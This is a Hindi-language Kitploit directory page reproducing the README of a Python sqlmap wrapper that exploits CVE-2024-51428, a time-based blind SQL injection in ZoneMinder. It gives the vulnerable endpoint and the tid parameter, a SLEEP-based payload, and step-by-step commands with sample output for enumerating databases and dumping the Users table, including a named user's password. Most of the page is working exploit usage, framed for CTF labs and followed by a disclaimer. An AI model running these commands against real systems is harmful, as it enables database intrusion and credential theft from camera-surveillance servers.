Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-51428-PoC — विज़न माइंडर (ZoneMinder) में CVE-2024-51428 का शोषण करने के लिए ब्लाइंड SQL इंजेक्शन का उपयोग करते हुए Python में लिखा गया रैपर, जो sqlmap के माध्यम से डेटाबेस, तालिकाओं की स्वचालित गणना और साफ आउटपुट के साथ डेटा निष्कर्षण करता है। | Kitploit
उपकरण/GitHubGitHub/d1se0/cve-2024-51428-poc
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubd1se0/cve-2024-51428-poc

CVE-2024-51428-PoC

विज़न माइंडर (ZoneMinder) में CVE-2024-51428 का शोषण करने के लिए ब्लाइंड SQL इंजेक्शन का उपयोग करते हुए Python में लिखा गया रैपर, जो sqlmap के माध्यम से डेटाबेस, तालिकाओं की स्वचालित गणना और साफ आउटपुट के साथ डेटा निष्कर्षण करता है।

रिपॉजिटरी देखें
15 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-51428 - ZoneMinder ब्लाइंड SQL इंजेक्शन PoC

sqlmap के लिए Python रैपर जो ZoneMinder में CVE-2024-51428 का शोषण करने के लिए डिज़ाइन किया गया है।
यह उपकरण ब्लाइंड SQL इंजेक्शन कमजोरी का पता लगाने और शोषण को स्वचालित करता है, जबकि आउटपुट को साफ और उपयोगी डेटा पर केंद्रित रखता है।

स्क्रिप्ट sqlmap लॉग को छुपाता है और केवल प्रासंगिक जानकारी प्रदर्शित करता है जैसे:

  • पता लगाया गया इंजेक्शन बिंदु
  • डेटाबेस नाम
  • तालिकाएँ
  • डंप किए गए क्रेडेंशियल्स या संवेदनशील डेटा

यह उपकरण को CTF वातावरण, प्रदर्शनों और सुरक्षा परीक्षण के लिए आदर्श बनाता है।


कमजोरी का अवलोकन

CVE: CVE-2024-51428
प्रकार: ब्लाइंड SQL इंजेक्शन
प्रभावित सॉफ्टवेयर: ZoneMinder
हमला वेक्टर: HTTP GET पैरामीटर
पैरामीटर: tid

कमजोरी निम्नलिखित एंडपॉइंट में मौजूद है:

root@kitploit:~
/zm/index.php?view=request&request=event&action=removetag&tid=

tid पैरामीटर को डेटाबेस क्वेरी में उपयोग करने से पहले ठीक से सैनिटाइज़ नहीं किया जाता है, जिससे हमलावर SQL क्वेरी इंजेक्ट कर सकते हैं।

उपयोग की गई शोषण तकनीक समय-आधारित ब्लाइंड SQL इंजेक्शन है।

sqlmap द्वारा खोजा गया उदाहरण पेलोड:

root@kitploit:~
tid=1 AND (SELECT 3475 FROM (SELECT(SLEEP(5)))BZWD)

यह पेलोड डेटाबेस को सोने के लिए मजबूर करता है यदि क्वेरी सफलतापूर्वक निष्पादित होती है, जिससे SQL इंजेक्शन की उपस्थिति की पुष्टि होती है।


विशेषताएँ

  • स्वचालित ब्लाइंड SQL इंजेक्शन का पता लगाना
  • डेटाबेस गणना
  • तालिका गणना
  • तालिका डंपिंग
  • कॉलम फ़िल्टरिंग
  • पंक्ति फ़िल्टरिंग
  • साफ आउटपुट (sqlmap लॉग छिपे हुए)
  • CTF और पेंटेस्टिंग लैब के लिए डिज़ाइन किया गया

आवश्यकताएँ

  • Python 3
  • sqlmap

यदि आवश्यक हो तो sqlmap इंस्टॉल करें:

root@kitploit:~
sudo apt install sqlmap

उपयोग

मूल सिंटैक्स:

root@kitploit:~
python3 poc.py --url <TARGET_URL> -c '<ZMSESSID_COOKIE>'

इस कमांड से हम जांचते हैं कि यह कमजोर है या नहीं

उदाहरण:

root@kitploit:~
python3 poc.py --url http://target.htb -c '151fvdqmjkhnkfat7l5epgmd22'

आवश्यक कुकी प्राप्त करना

शोषण के लिए एक मान्य ZoneMinder सत्र कुकी की आवश्यकता होती है।

चरण:

  1. अपने ब्राउज़र में लक्ष्य खोलें
  2. डेवलपर टूल्स खोलें
  3. यहाँ जाएँ:
root@kitploit:~
Application → Cookies
  1. नाम वाली कुकी ढूंढें:
root@kitploit:~
ZMSESSID
  1. इसका मान कॉपी करें और -c के साथ उपयोग करें

उदाहरण:

root@kitploit:~
-c '151fvdqmjkhnkfat7l5epgmd22'

जाँच करना कि लक्ष्य कमजोर है या नहीं

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE'

उदाहरण आउटपुट:

root@kitploit:~
[*] Checking vulnerability...

Parameter: tid (GET)
Type: time-based blind
Payload: tid=1 AND (SELECT(SLEEP(5)))

[+] TARGET IS VULNERABLE TO BLIND SQL INJECTION

डेटाबेस गणना

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d

उदाहरण आउटपुट:

root@kitploit:~
available databases [3]:
information_schema
mysql
zm

तालिकाओं की गणना

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm

उदाहरण आउटपुट:

root@kitploit:~
Database: zm

Users
Events
Monitors
Storage

एक तालिका डंप करना

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users

एक विशिष्ट कॉलम डंप करना

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Users -f Username

उदाहरण:

root@kitploit:~
+----------+
| Username |
+----------+
| admin    |
| viewer   |
+----------+

पंक्तियों को फ़िल्टर करना (WHERE खंड)

आप पंक्तियों को इसका उपयोग करके फ़िल्टर कर सकते हैं:

root@kitploit:~
-ff <COLUMN> <VALUE>

उदाहरण:

root@kitploit:~
python3 poc.py --url http://target.htb -c 'COOKIE' -d -db zm -t Password -ff Username mark

समतुल्य SQL:

root@kitploit:~
WHERE Username='mark'

एक विशिष्ट उपयोगकर्ता के लिए पासवर्ड डंप करना

उदाहरण:

root@kitploit:~
python3 poc.py \
--url http://target.htb \
-c 'COOKIE' \
-d -db zm -t Users \
-f Password \
-ff Username mark

आंतरिक sqlmap कमांड:

root@kitploit:~
sqlmap -D zm -T Users -C Password --where="Username='mark'" --dump

उपकरण कैसे काम करता है

स्क्रिप्ट sqlmap के चारों ओर एक रैपर के रूप में कार्य करती है।

आंतरिक रूप से किए गए चरण:

  1. कमजोर एंडपॉइंट बनाएं
root@kitploit:~
/zm/index.php?view=request&request=event&action=removetag&tid=1
  1. प्रमाणीकरण कुकी को sqlmap को पास करें
  2. अनुकूलित विकल्पों के साथ sqlmap निष्पादित करें:
root@kitploit:~
--threads=10
--technique=T
--batch
  1. sqlmap आउटपुट को वास्तविक समय में पार्स करें
  2. लॉग को फ़िल्टर करें और केवल प्रदर्शित करें:
  • इंजेक्शन जानकारी
  • डेटाबेस
  • तालिकाएँ
  • डंप किया गया डेटा

इच्छित उपयोग

यह उपकरण इसके लिए बनाया गया था:

  • कैप्चर द फ्लैग चुनौतियाँ
  • सुरक्षा अनुसंधान
  • शैक्षिक उद्देश्य
  • पेंटेस्टिंग लैब

अस्वीकरण

यह प्रोजेक्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।

लेखक इस उपकरण के किसी भी दुरुपयोग के लिए जिम्मेदार नहीं है।

किसी भी सिस्टम का परीक्षण करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।


लेखक

सुरक्षा अनुसंधान / CTF उपकरण निर्माण

टूल डाउनलोड करें